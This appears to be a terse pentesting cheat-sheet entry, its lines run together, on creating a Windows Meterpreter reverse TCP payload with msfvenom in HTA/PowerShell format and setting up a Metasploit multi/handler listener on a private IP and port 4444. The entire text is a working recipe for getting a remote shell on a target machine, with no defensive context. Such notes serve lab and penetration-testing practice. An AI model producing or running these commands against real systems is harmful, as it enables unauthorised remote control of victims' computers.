msfvenom payload of powershell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.136 LPORT=4444 -f hta-pshListen, msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost and lport